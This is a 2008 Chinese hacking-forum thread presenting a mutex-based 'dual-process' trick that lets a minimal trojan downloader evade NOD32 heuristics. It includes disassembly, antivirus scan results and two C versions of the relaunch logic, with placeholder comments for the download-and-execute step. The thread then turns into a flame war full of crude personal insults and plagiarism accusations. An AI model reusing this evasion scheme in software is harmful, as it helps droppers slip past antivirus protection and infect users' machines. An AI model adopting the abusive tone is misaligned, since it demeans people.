[原创]最简单的双进程对抗NOD32启发..
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])文章作者:洋洋洒洒
又拿最简单的下载者做演示.非常简单.
稍稍搞复杂点.估计就能过一片的"高级虚拟启发"等等吧.
附上EXE.代码直接看文件吧...[s:310] 仅仅说明杀毒软件查杀方式并不像广告里说的先进...
....一个几年前的东西就可以轻易过掉...传统特征码还是不能丢啊...XXXX好像就把特征码库丢了.. 过不了小红伞。。。一样是启发式滴~~说明小红伞比NOD32好多了。
NOD32没测试,装了一天就把它卸了,感觉太垃圾。
回复 椅子 风泽 的帖子
小红伞和卡吧...都不厚道...如果你程序体积很小.估计病毒特征加1
扫描导入表 有urldownload... 又加1
程序什么都不干 .. 接着加1
这些加加减减的不是虚拟执行启发...
小伞比NOD32...只是标准不同罢了...能力应该...
[[i] 本帖最后由 洋洋洒洒 于 2008-4-24 17:32 编辑 [/i]] 0040111F 57 push edi
00401120 57 push edi
00401121 FF15 98104000 call dword ptr ds:[<&KERNEL32.CreateMutexA>>; kernel32.CreateMutexA
00401127 FF15 A0104000 call dword ptr ds:[<&KERNEL32.GetLastError>>; ntdll.RtlGetLastWin32Error
0040112D 85C0 test eax,eax
0040112F 75 27 jnz short 1.00401158
00401131 B9 AC114000 mov ecx,1.004011AC
00401136 57 push edi
00401137 51 push ecx
00401138 68 04010000 push 104
0040113D 51 push ecx
0040113E 57 push edi
0040113F FF15 A4104000 call dword ptr ds:[<&KERNEL32.GetModuleFile>; kernel32.GetModuleFileNameA
00401145 FF15 AC104000 call dword ptr ds:[<&KERNEL32.WinExec>] ; kernel32.WinExec
0040114B 68 E8030000 push 3E8
00401150 FF15 A8104000 call dword ptr ds:[<&KERNEL32.Sleep>] ; kernel32.Sleep
00401156 EB 4D jmp short 1.004011A5
CreateMutexA函数创建名为Mutex_xyz_123的互斥标识...
1.如果不存在则通过GetModuleFile获取自身路径,WinExec运行之...
然后Sleep(1000),再跳去ExitProcess...
2.如果存在互斥标识,证明自身是安全的,用URLDownloadToFileA下载文件并用WinExec运行之..
不知有没有错...:sweat:
回复 地板 7个b 的帖子
[quote]CreateMutexA函数创建名为Mutex_xyz_123的互斥标识...1.如果不存在则通过GetModuleFile获取自身路径,WinExec运行之...
然后Sleep(1000),再跳去ExitProcess...
2.如果存在互斥标识,证明自身是安全的,用URLDownloadToFileA下载文件并用WinExec运行之..
不知有没有错...[/quote]
嗯.对
[quote]那里来的代码文件?[/quote]
附近里面有文件......放od里就是了 2.如果存在互斥标识,证明自身是安全的,用URLDownloadToFileA下载文件并用WinExec运行之..
不知有没有错...
这样就不能防止程序同时多次运行了。 你就在加句代码多判断一下吧..[s:313] 如果本身存在NOD32特征吗的话就没效果了? 反病毒引擎 版本 最后更新 扫描结果
AhnLab-V3 - - -
AntiVir - - TR/Agent.939
Authentium - - Possibly a new variant of W32/Downloader-Sml-based!Maximus
Avast - - -
AVG - - Downloader.Small.CGQ
BitDefender - - Generic.Malware.dld!!.31030000
CAT-QuickHeal - - TrojanDownloader.Tiny.aqb
ClamAV - - Trojan.Tiny-4
DrWeb - - Trojan.DownLoader.origin
eSafe - - -
eTrust-Vet - - Win32/VMalum.CRJA
Ewido - - -
F-Prot - - W32/Downloader-Sml-based!Maximus
F-Secure - - W32/Downloader
FileAdvisor - - -
Fortinet - - -
Ikarus - - Win32.SuspectCrc
Kaspersky - - Trojan-Downloader.Win32.Tiny.aqb
McAfee - - -
Microsoft - - -
NOD32v2 - - -
Norman - - W32/Agent.FICC
Panda - - -
Prevx1 - - -
Rising - - -
Sophos - - Mal/Heuri-E
Sunbelt - - -
Symantec - - -
TheHacker - - Trojan/Downloader.Tiny.aqb
VBA32 - - Trojan-Downloader.Win32.Tiny.aqb
VirusBuster - - -
Webwasher-Gateway - - Trojan.Agent.939 请问一下你懂C吗?我在VC里重写了下你写的最简单的双进程对抗nod32启发,但发现似乎没有效果,不知道是不是我写错了。代码如下:
char strAppName[] = "OnlyOne";
HANDLE hMutex = NULL;
//创建互斥对象
hMutex = CreateMutex(NULL, FALSE, strAppName);
if (hMutex != NULL)
{
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
// URLDownloadToFileA ........
}
char strPath[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), strPath, sizeof(strPath));
WinExec(strPath, SW_HIDE);
Sleep(1000);
ExitProcess(-1);
}
请指教下。如代码有不对的,请帮忙更正下. 谢谢 :lol: ...
楼上你那样写 估计系统会崩溃了...我帮你改了下[code]
int Test()
{
char strAppName[] = "OnlyOne";
char strPath[MAX_PATH];
HANDLE hMutex = NULL;
//创建互斥对象
hMutex = CreateMutex(NULL, FALSE, strAppName);
if (hMutex != NULL)
{
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
MessageBox(NULL,"二次运行","",0);
// URLDownloadToFileA ........ 这里下载文件
//WinExec(); 这里 打开下载的文件
}
else
{
MessageBox(NULL,"一次运行","",0);
GetModuleFileName(GetModuleHandle(NULL), strPath, sizeof(strPath));
WinExec(strPath, SW_HIDE);
Sleep(1000);
ExitProcess(-1);
}
}
return 0;
}[/code]
[[i] 本帖最后由 simen521 于 2008-6-2 14:49 编辑 [/i]] 就加了一个信息框就不会崩溃了? 我写的没信息框就会崩溃? 为什么我没发C的代码出来前,你不发布说是你的原创, 我一发贴, 你就在小熊技术论坛以原创的形式发布代码.
真搞不懂, 明明是洋洋洒洒的原创, 也不说明下, 还打着原创............. TO :peterxiong
水至清则无鱼,人至贱则无敌!
go on.. 是啊, 你早就无敌了。 还封我小熊论坛ID. 贱到一B了。
除了抄袭,你还会什么? 你所谓的原创,哪个不是抄来的。 我一向不会浪费时间在猪狗不如的东西上面
不过还是让大家见识下此种动物的风采吧!!
屁 儿 特 芎
[url]http://www.mybr.org/thread-33080-1-9.html[/url]
[color=Red]某高对他的教育[/color]
[attach]11948[/attach]
[url]http://www.mybr.org/viewthread.php?tid=37688&extra=&page=2[/url]
[color=Red]这个就更有意思了 还冒充别人 真让我笑的肚子疼了 [/color]
[attach]11949[/attach]
[attach]11950[/attach]
[attach]11951[/attach]
看看本帖11楼那个死循环就知道你什么水平了
还问我 啊你就加个提示就不什么什么了 笑死我了
还有更多 装逼情景 不贴了 有喜欢看笑话的自己去看吧 :lol: :lol: :lol: [attach]11952[/attach]
再说说你喷出的原创问题 真j8弱智! 我那个帖子写原创二字了?
[attach]11953[/attach]
代码和程序都分不清楚 还吹牛逼呢 啊 "其实我一直在使用了" 你使用NMB了啊? 笑
我2007年 做的一个程序中就用过这个方法了
[url]http://www.mybr.org/thread-10363-1-2.html[/url]
[attach]11954[/attach]
而这个帖子是2008年4月19日的
知道啥叫反汇编不 自己反下看看吧
好心帮你解决问题 回复你了 却招来一顿乱咬 真是禽兽不如!
坐井关天 狂妄自大 疯狂乱咬
形容你这样的SB最合适不过了 浪费时间! c n m 刚看了下小熊xionglonghui这个人 的确很虚伪
楼上图文并茂 很好
xiong 在你攻击别人的时候
最好把你的证据也列举下给大家看看 那样才能让人信服 [s:272] 很漂亮的攻防啊~ 见过贱的,没见这么贱的. 仗着自己是delphi块的版主, 就随意修改帖子别人发的帖子. 见过贱的,这么贱的我还是第一次见到。今天算是开眼了。
纠正一下"冰山万里" 朋友说的话, xiong 在你攻击别人的时候 最好把你的证据也列举下给大家看看 那样才能让人信服. 我不是有意要攻击他. 我刚开始根本就没有这个意思. 我只是说了句 这是洋洋洒洒的代码重写的, 他二话不说, 就把我在小熊论坛ID封了。 这样的人品, 我算是见识了。后来我偶然进下这个论坛发现他的回帖和他发贴的时间, 发现有可能是直接复制我翻译的那个C代码. 但却打着原创的旗号, 现在又把 原创 2字,改成代码, 真他妈的垃圾. 仗着自己是论坛版主, 就随意修改帖子, 可耻不, 你改自己的就算了,还改别人的,真TMD垃圾.
冰山万里 叫我最好截图提供证据, 我现在论坛都进不去,怎么截图. 好不容易刚恢复论坛ID, 他又仗着自己是delphi版主, 禁止我的ID进入delphi板块.
口口声声说自己2007年 做的一个程序中就用过这个方法了. 还嚷着叫我去逆向, 大家去逆向看看,能找得到CreateMutex,GetLastError 这个代码里的两个基本函数吗?
我随手写的个代码, 就说这样写会系统崩溃, 哈哈,搞笑,这是正式代码吗? 你也不看看清楚, 还说我的代码会死循环,搞笑了,随手写的是很不严谨, 但说成会死循环的也够SB了,我哪里用了循环了? 少了个else也不是死循环吧. 你能不能贴到编译器里编译运行下再说.
他贴的图都是对我不利的,有些是真的。但有些你没看全. 我也不想多说了, SB我见的多了,让他去骂好了。不就说了句这个代码原创是洋洋洒洒吗?搞出这么多事, 你说明下会死吗? 虚荣心就这么强, 硬要说是自己原创.
小熊论坛我不去了, 行吧.... 你再去封号吧.
我承认我骂过很多人, 惹怒过很多人, 你们见到的贴图, 有些是真的,个别人针对我的,但你们没有看全帖子, 对于我在小熊论坛回复别人骂我的帖子, 凡是我回复有点正当理由的不是被屏蔽,就是被删除, 有的直接修改帖子内容. 真他妈贱B一个。
我也不想说什么了。 这里不是争论, 吵架的地方.
版主, 见到我的信息后, 请把我发的争吵的帖子都删除了吧. 没必要再争论下去了。
[[i] 本帖最后由 peterxiong 于 2008-6-20 21:30 编辑 [/i]]
页:
[1]